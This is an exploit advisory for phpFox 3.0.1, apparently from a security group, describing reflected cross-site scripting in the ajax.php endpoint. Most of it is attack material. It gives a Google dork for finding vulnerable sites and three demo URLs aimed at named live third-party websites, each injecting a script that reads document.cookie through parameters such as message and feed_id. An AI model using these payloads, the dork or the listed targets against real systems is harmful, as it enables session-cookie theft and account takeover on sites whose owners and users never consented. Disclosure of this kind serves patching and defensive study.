PhpFox 3.0.1 suffers from a cross site scripting vulnerability. Note that this finding houses site-specific data.
1dbc0fc5007f7c1acb3f9045ea301c74cd5c22c56df3cd1f9faa654ffcb680b9
<!--
________ .__ __________________
\_ ___ \_______|__| _____ \_____ \______ \
/ \ \/\_ __ \ |/ \ _(__ <| _/
\ \____| | \/ | Y Y \/ \ | \
\______ /|__| |__|__|_| /______ /____|_ /
\/ \/ \/ \/
M3Mb3R OF AjaxTm
-->
# Exploit Title: phpFox Version 3.0.1 Cross site Scripting Vulnerability
#
# Google Dork: Intext:"Powered By phpFox Version 3.0.1"
#
# Date: 09/04/2012
#
# Author: Crim3R & Ajax Security Team
#
# Home : Http://WwW.AjaxTm.com/
#
# Vendor Home : http://www.phpfox.com/
#
# Tested on: all
#
==================================
[+] There is a lots of parametrs Vulnerable to xss in ajax.php file like feed_id & message & title & ...
D3m0:
http://buddymahal.com//static/ajax.php?core[ajax]=true&core[call]=core.message&core[security_token]=860eb6a699d5d9f375b5e8cf0021c094&height=150&message="><script>alert(document.cookie);</script>&width=300
http://www.didarmasumane.tk//static/ajax.php?comment_type_id=feed&core[ajax]=true&core[call]=comment.viewMoreFeed&core[is_admincp]=0&core[is_user_profile]=1&core[profile_user_id]=25&core[security_token]=1fa4d24158b81e721c5974d7f175b2ac&feed_id="><script>alert(document.cookie);</script>&item_id=518&_=1346525603467
http://www.didarmasumane.tk//static/ajax.php?comment_type_id=feed&core[ajax]=true&core[call]=comment.viewMoreFeed&core[is_admincp]=0&core[is_user_profile]=1&core[profile_user_id]=25&core[security_token]=1fa4d24158b81e721c5974d7f175b2ac&feed_id=id&item_id=518"><script>alert(document.cookie);</script>&_=1346525603467
===============Crim3R@Att.Net=========
[+] Greetz to All Ajaxtm Security Member
Cair3x - HUrr!c4nE - E2MA3N - S3Ri0uS - iM4n - Sc0rpion - Daniyal
devilzc0der - Dominator - Hossein.R1369